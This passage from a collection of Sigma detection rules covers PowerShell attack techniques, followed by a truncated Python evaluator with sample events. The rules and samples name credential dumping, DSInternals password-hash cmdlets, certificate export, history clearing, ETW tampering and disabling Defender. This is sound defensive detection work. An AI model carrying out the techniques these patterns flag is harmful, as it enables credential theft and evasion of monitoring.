    "content": "title: Clearing Windows Console History\nid: bde47d4b-9987-405c-94c7-b080410e8ea7\nstatus: test\ndescription: Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\nreferences:\n    - https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/\n    - https://www.shellhacks.com/clear-history-powershell/\n    - https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\nauthor: Austin Songer @austinsonger\ndate: 2021-11-25\nmodified: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection1:\n        ScriptBlockText|contains: Clear-History\n    selection2a:\n        ScriptBlockText|contains:\n            - Remove-Item\n            - rm\n    selection2b:\n        ScriptBlockText|contains:\n            - ConsoleHost_history.txt\n            - (Get-PSReadlineOption).HistorySavePath\n    condition: selection1 or selection2a and selection2b\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml",
    "content": "title: Powershell Create Scheduled Task\nid: 363eccc0-279a-4ccf-a3ab-24c2e63b11fb\nstatus: test\ndescription: Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task\nauthor: frack113\ndate: 2021-12-28\nmodified: 2025-10-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains:\n            - 'New-ScheduledTaskAction'\n            - 'New-ScheduledTaskTrigger'\n            - 'New-ScheduledTaskPrincipal'\n            - 'New-ScheduledTaskSettingsSet'\n            - 'New-ScheduledTask'\n            - 'Register-ScheduledTask'\n    selection_cimmethod:\n        ScriptBlockText|contains|all:\n            - 'Invoke-CimMethod'\n            - '-ClassName'\n            - 'PS_ScheduledTask'\n            - '-NameSpace'\n            - 'Root\\Microsoft\\Windows\\TaskScheduler'\n    filter_main_legitimate_scripts:\n        ScriptBlockText|contains|all:\n            - 'Microsoft.PowerShell.Core\\Export-ModuleMember'\n            - 'Microsoft.Management.Infrastructure.CimInstance'\n            - '__cmdletization_methodParameter'\n    condition: 1 of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml",
    "content": "title: Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell\nid: db885529-903f-4c5d-9864-28fe199e6370\nrelated:\n    - id: 435e10e4-992a-4281-96f3-38b11106adde\n      type: similar\nstatus: test\ndescription: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file\nreferences:\n    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\n    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/\n    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Get-ADComputer '\n            - ' -Filter \\*'\n        ScriptBlockText|contains:\n            - ' | Select '\n            - 'Out-File'\n            - 'Set-Content'\n            - 'Add-Content'\n    condition: selection\nfalsepositives:\n    - Legitimate admin scripts may use the same technique. It is better to exclude specific computers or users who execute these commands or scripts often\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_copy_item_system_directory.yml",
    "content": "title: Powershell Install a DLL in System Directory\nid: 63bf8794-9917-45bc-88dd-e1b5abc0ecfd\nstatus: test\ndescription: Uses PowerShell to install/copy a file into a system directory such as \"System32\" or \"SysWOW64\"\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-27\nmodified: 2024-01-22\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.t1556.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|re: '(Copy-Item|cpi) .{2,128} -Destination .{1,32}\\\\Windows\\\\(System32|SysWOW64)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml",
    "content": "title: Registry-Free Process Scope COR_PROFILER\nid: 23590215-4702-4a70-8805-8dc9e58314a2\nstatus: test\ndescription: |\n    Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\n    The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\n    These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n    (Citation: Microsoft Profiling Mar 2017)\n    (Citation: Microsoft COR_PROFILER Feb 2013)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\nauthor: frack113\ndate: 2021-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.t1574.012\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '$env:COR_ENABLE_PROFILING'\n            - '$env:COR_PROFILER'\n            - '$env:COR_PROFILER_PATH'\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_create_local_user.yml",
    "content": "title: PowerShell Create Local User\nid: 243de76f-4725-4f2e-8225-a8a69b15ad61\nstatus: test\ndescription: Detects creation of a local user via PowerShell\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\nauthor: '@ROxPinTeddy'\ndate: 2020-04-11\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.persistence\n    - attack.t1136.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: 'New-LocalUser'\n    condition: selection\nfalsepositives:\n    - Legitimate user creation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml",
    "content": "title: Create Volume Shadow Copy with Powershell\nid: afd12fed-b0ec-45c9-a13d-aa86625dac81\nstatus: test\ndescription: Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7\nauthor: frack113\ndate: 2022-01-12\ntags:\n    - attack.credential-access\n    - attack.t1003.003\n    - attack.ds0005\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Win32_ShadowCopy\n            - ').Create('\n            - ClientAccessible\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml",
    "content": "title: Powershell Detect Virtualization Environment\nid: d93129cd-1ee0-479f-bc03-ca6f129882e3\nstatus: test\ndescription: |\n    Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\n    This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md\n    - https://techgenix.com/malicious-powershell-scripts-evade-detection/\nauthor: frack113, Duc.Le-GTSC\ndate: 2021-08-03\nmodified: 2022-03-03\ntags:\n    - attack.discovery\n    - attack.defense-evasion\n    - attack.t1497.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_action:\n        ScriptBlockText|contains:\n            - Get-WmiObject\n            - gwmi\n    selection_module:\n        ScriptBlockText|contains:\n            - MSAcpi_ThermalZoneTemperature\n            - Win32_ComputerSystem\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_directorysearcher.yml",
    "content": "title: DirectorySearcher Powershell Exploitation\nid: 1f6399cf-2c80-4924-ace1-6fcff3393480\nstatus: test\ndescription: Enumerates Active Directory to determine computers that are joined to the domain\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher\nauthor: frack113\ndate: 2022-02-12\ntags:\n    - attack.discovery\n    - attack.t1018\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'New-Object '\n            - 'System.DirectoryServices.DirectorySearcher'\n            - '.PropertiesToLoad.Add'\n            - '.findall()'\n            - 'Properties.name'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml",
    "content": "title: Manipulation of User Computer or Group Security Principals Across AD\nid: b29a93fb-087c-4b5b-a84d-ee3309e69d08\nstatus: test\ndescription: |\n    Adversaries may create a domain account to maintain access to victim systems.\n    Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell\n    - https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0\nauthor: frack113\ndate: 2021-12-28\ntags:\n    - attack.persistence\n    - attack.t1136.002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: System.DirectoryServices.AccountManagement\n    condition: selection\nfalsepositives:\n    - Legitimate administrative script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_disable_psreadline_command_history.yml",
    "content": "title: Disable Powershell Command History\nid: 602f5669-6927-4688-84db-0d4b7afb2150\nstatus: test\ndescription: Detects scripts or commands that disable the PowerShell command history by removing the PSReadline module\nreferences:\n    - https://twitter.com/DissectMalware/status/1062879286749773824\nauthor: Ali Alwashali\ndate: 2022-08-21\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - Remove-Module\n            - psreadline\n    condition: selection\nfalsepositives:\n    - Legitimate script that disables the command history\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_disable_windows_optional_feature.yml",
    "content": "title: Disable-WindowsOptionalFeature Command PowerShell\nid: 99c4658d-2c5e-4d87-828d-7c066ca537c3\nstatus: test\ndescription: |\n    Detects the built-in PowerShell cmdlet Disable-WindowsOptionalFeature, part of the Deployment Image Servicing and Management (DISM) module.\n    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md\n    - https://learn.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps\nauthor: frack113\ndate: 2022-09-10\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - 'Disable-WindowsOptionalFeature'\n            - '-Online'\n            - '-FeatureName'\n    selection_feature:\n        # Add any important windows features\n        ScriptBlockText|contains:\n            - 'Windows-Defender-Gui'\n            - 'Windows-Defender-Features'\n            - 'Windows-Defender'\n            - 'Windows-Defender-ApplicationGuard'\n            # - 'Containers-DisposableClientVM' # Windows Sandbox\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_dotnet_assembly_from_file.yml",
    "content": "title: Potential In-Memory Execution Using Reflection.Assembly\nid: ddcd88cb-7f62-4ce5-86f9-1704190feb0a\nstatus: test\ndescription: Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.defense-evasion\n    - attack.t1620\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enable\ndetection:\n    selection:\n        ScriptBlockText|contains: '[Reflection.Assembly]::load'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the library\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml",
    "content": "title: Potential COM Objects Download Cradles Usage - PS Script\nid: 3c7d1587-3b13-439f-9941-7d14313dbdfe\nrelated:\n    - id: 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf\n      type: similar\nstatus: test\ndescription: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0\n    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57\nauthor: frack113\ndate: 2022-12-25\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enable\ndetection:\n    selection_1:\n        ScriptBlockText|contains: '[Type]::GetTypeFromCLSID('\n    selection_2:\n        ScriptBlockText|contains:\n            - '0002DF01-0000-0000-C000-000000000046'\n            - 'F6D90F16-9C73-11D3-B32E-00C04F990BB4'\n            - 'F5078F35-C551-11D3-89B9-0000F81FE221'\n            - '88d96a0a-f192-11d4-a65f-0040963251e5'\n            - 'AFBA6B42-5692-48EA-8141-DC517DCF0EF1'\n            - 'AFB40FFD-B609-40A3-9828-F88BBE11E4E3'\n            - '88d96a0b-f192-11d4-a65f-0040963251e5'\n            - '2087c2f4-2cef-4953-a8ab-66779b670495'\n            - '000209FF-0000-0000-C000-000000000046'\n            - '00024500-0000-0000-C000-000000000046'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the library\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_dsinternals_cmdlets.yml",
    "content": "title: DSInternals Suspicious PowerShell Cmdlets - ScriptBlock\nid: 846c7a87-8e14-4569-9d49-ecfd4276a01c\nrelated:\n    - id: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e\n      type: similar\nstatus: test\ndescription: |\n    Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.\n    The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\nreferences:\n    - https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-26\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Add-ADDBSidHistory'\n            - 'Add-ADNgcKey'\n            - 'Add-ADReplNgcKey'\n            - 'ConvertFrom-ADManagedPasswordBlob'\n            - 'ConvertFrom-GPPrefPassword'\n            - 'ConvertFrom-ManagedPasswordBlob'\n            - 'ConvertFrom-UnattendXmlPassword'\n            - 'ConvertFrom-UnicodePassword'\n            - 'ConvertTo-AADHash'\n            - 'ConvertTo-GPPrefPassword'\n            - 'ConvertTo-KerberosKey'\n            - 'ConvertTo-LMHash'\n            - 'ConvertTo-MsoPasswordHash'\n            - 'ConvertTo-NTHash'\n            - 'ConvertTo-OrgIdHash'\n            - 'ConvertTo-UnicodePassword'\n            - 'Disable-ADDBAccount'\n            - 'Enable-ADDBAccount'\n            - 'Get-ADDBAccount'\n            - 'Get-ADDBBackupKey'\n            - 
'Get-ADDBDomainController'\n            - 'Get-ADDBGroupManagedServiceAccount'\n            - 'Get-ADDBKdsRootKey'\n            - 'Get-ADDBSchemaAttribute'\n            - 'Get-ADDBServiceAccount'\n            - 'Get-ADDefaultPasswordPolicy'\n            - 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'\n            - 'Get-ADPasswordPolicy'\n            - 'Get-ADReplAccount'\n            - 'Get-ADReplBackupKey'\n            - 'Get-ADReplicationAccount'\n            - 'Get-ADSIAccount'\n            - 'Get-AzureADUserEx'\n            - 'Get-BootKey'\n            - 'Get-KeyCredential'\n            - 'Get-LsaBackupKey'\n            - 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'\n            - 'Get-SamPasswordPolicy'\n            - 'Get-SysKey'\n            - 'Get-SystemKey'\n            - 'New-ADDBRestoreFromMediaScript'\n            - 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'\n            - 'New-ADNgcKey'\n            - 'New-NTHashSet'\n            - 'Remove-ADDBObject'\n            - 'Save-DPAPIBlob'\n            - 'Set-ADAccountPasswordHash'\n            - 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'\n            - 'Set-ADDBBootKey'\n            - 'Set-ADDBDomainController'\n            - 'Set-ADDBPrimaryGroup'\n            - 'Set-ADDBSysKey'\n            - 'Set-AzureADUserEx'\n            - 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'\n            - 'Set-SamAccountPasswordHash'\n            - 'Set-WinUserPasswordHash'\n            - 'Test-ADDBPasswordQuality'\n            - 'Test-ADPasswordQuality'\n            - 'Test-ADReplPasswordQuality'\n            - 'Test-PasswordQuality'\n            - 'Unlock-ADDBAccount'\n            - 'Write-ADNgcKey'\n            - 'Write-ADReplNgcKey'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of DSInternals for administration or audit purpose.\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_dump_password_windows_credential_manager.yml",
    "content": "title: Dump Credentials from Windows Credential Manager With PowerShell\nid: 99c49d9c-34ea-45f7-84a7-4751ae6b2cbc\nstatus: test\ndescription: |\n    Adversaries may search for common password storage locations to obtain user credentials.\n    Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md\nauthor: frack113\ndate: 2021-12-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1555\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_kiddie:\n        ScriptBlockText|contains:\n            - 'Get-PasswordVaultCredentials'\n            - 'Get-CredManCreds'\n    selection_rename_Password:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'Windows.Security.Credentials.PasswordVault'\n    selection_rename_credman:\n        ScriptBlockText|contains|all:\n            - 'New-Object'\n            - 'Microsoft.CSharp.CSharpCodeProvider'\n            - '[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())'\n            - 'Collections.ArrayList'\n            - 'System.CodeDom.Compiler.CompilerParameters'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml",
    "content": "title: Enable Windows Remote Management\nid: 991a9744-f2f0-44f2-bd33-9092eba17dc3\nstatus: test\ndescription: Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2\nauthor: frack113\ndate: 2022-01-07\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Enable-PSRemoting '\n    condition: selection_cmdlet\nfalsepositives:\n    - Legitimate script\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_enable_susp_windows_optional_feature.yml",
    "content": "title: Potential Suspicious Windows Feature Enabled\nid: 55c925c1-7195-426b-a136-a9396800e29b\nrelated:\n    - id: c740d4cf-a1e9-41de-bb16-8a46a4f57918\n      type: similar\nstatus: test\ndescription: |\n    Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\n    Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\n    - https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system\n    - https://learn.microsoft.com/en-us/windows/wsl/install-on-server\nauthor: frack113\ndate: 2022-09-10\nmodified: 2022-12-29\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - 'Enable-WindowsOptionalFeature'\n            - '-Online'\n            - '-FeatureName'\n    selection_feature:\n        # Add any insecure/unusual windows features to your env\n        ScriptBlockText|contains:\n            - 'TelnetServer'\n            - 'Internet-Explorer-Optional-amd64'\n            - 'TFTP'\n            - 'SMB1Protocol'\n            - 'Client-ProjFS'\n            - 'Microsoft-Windows-Subsystem-Linux'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the features listed in the rule.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_enumerate_password_windows_credential_manager.yml",
    "content": "title: Enumerate Credentials from Windows Credential Manager With PowerShell\nid: 603c6630-5225-49c1-8047-26c964553e0e\nstatus: test\ndescription: |\n    Adversaries may search for common password storage locations to obtain user credentials.\n    Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md\nauthor: frack113\ndate: 2021-12-20\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1555\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - vaultcmd\n            - '/listcreds:'\n    selection_option:\n        ScriptBlockText|contains:\n            - 'Windows Credentials'\n            - 'Web Credentials'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_etw_trace_evasion.yml",
    "content": "title: Disable of ETW Trace - Powershell\nid: 115fdba9-f017-42e6-84cf-d5573bf2ddf8\nrelated:\n    - id: a238b5d0-ce2d-4414-a676-7a531b3d13d6\n      type: derived\nstatus: test\ndescription: Detects usage of powershell cmdlets to disable or remove ETW trace sessions\nreferences:\n    - https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-28\nmodified: 2022-11-25\ntags:\n    - attack.defense-evasion\n    - attack.t1070\n    - attack.t1562.006\n    - car.2016-04-002\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_pwsh_remove:   # Autologger provider removal\n        ScriptBlockText|contains: 'Remove-EtwTraceProvider '\n    selection_pwsh_set:   # Provider “Enable” property modification\n        ScriptBlockText|contains|all:\n            - 'Set-EtwTraceProvider '\n            - '0x11'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_export_certificate.yml",
    "content": "title: Certificate Exported Via PowerShell - ScriptBlock\nid: aa7a3fce-bef5-4311-9cc1-5f04bb8c308c\nrelated:\n    - id: 9e716b33-63b2-46da-86a4-bd3c3b9b5dfb\n      type: similar\nstatus: test\ndescription: Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.\nreferences:\n    - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a\n    - https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps\n    - https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-04-23\nmodified: 2023-05-18\ntags:\n    - attack.credential-access\n    - attack.t1552.004\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Export-PfxCertificate'\n            - 'Export-Certificate'\n    filter_optional_module_export:\n        ScriptBlockText|contains: 'CmdletsToExport = @('\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate certificate exports by administrators. Additional filters might be required.\nlevel: medium\n"
  },
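The rules above all evaluate string selections over ScriptBlockText and combine them with a condition such as `all of selection*` or `selection and not 1 of filter_optional_*`. The following Python is an added example, not code from the Sigma project or from any Sigma backend: it implements just that subset of the rule language (case-insensitive `contains` and `contains|all`, the `all of` and `N of` quantifiers, `and`, `or`, `not`) and runs the Disable-WindowsOptionalFeature and Certificate Exported rules over constructed Event ID 4104 script block texts. The rule dictionaries, the sample events and the function names are this example's own assumptions.

```python
"""Evaluate the ScriptBlockText detection logic of Sigma rules on sample events.

Added example, not code from the Sigma project. Only the subset of the Sigma
language used by the rules on this page is implemented: the `contains` and
`contains|all` modifiers (case-insensitive, as Sigma backends match), and the
condition forms `selection`, `all of selection*`, `1 of selection_*` and
`selection and not 1 of filter_*`. Wildcards, regular expressions and other
modifiers are deliberately out of scope.
"""
import fnmatch

# Two detection blocks transcribed from the rules above (only the fields the
# evaluator needs); the rule titles serve as labels for the output.
RULES = {
    "Disable-WindowsOptionalFeature Command PowerShell": {
        "selection_cmd": {"ScriptBlockText|contains|all": [
            "Disable-WindowsOptionalFeature", "-Online", "-FeatureName"]},
        "selection_feature": {"ScriptBlockText|contains": [
            "Windows-Defender-Gui", "Windows-Defender-Features",
            "Windows-Defender", "Windows-Defender-ApplicationGuard"]},
        "condition": "all of selection*",
    },
    "Certificate Exported Via PowerShell - ScriptBlock": {
        "selection": {"ScriptBlockText|contains": [
            "Export-PfxCertificate", "Export-Certificate"]},
        "filter_optional_module_export": {
            "ScriptBlockText|contains": "CmdletsToExport = @("},
        "condition": "selection and not 1 of filter_optional_*",
    },
}

# Constructed ScriptBlockText values (Event ID 4104), not real telemetry.
SAMPLE_EVENTS = [
    "Disable-WindowsOptionalFeature -Online -FeatureName Windows-Defender -NoRestart",
    "Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol",
    "Get-ChildItem Cert:\\LocalMachine\\My | Export-PfxCertificate "
    "-FilePath C:\\Users\\Public\\m.pfx -Password $pw",
    "CmdletsToExport = @('Export-PfxCertificate', 'Import-PfxCertificate')",
    "Get-Process | Sort-Object CPU -Descending",
]


def selection_matches(text: str, selection: dict) -> bool:
    """Apply one selection: every field spec in it must hold (implicit AND)."""
    for field_spec, values in selection.items():
        field, *modifiers = field_spec.split("|")
        if field != "ScriptBlockText" or modifiers[:1] != ["contains"]:
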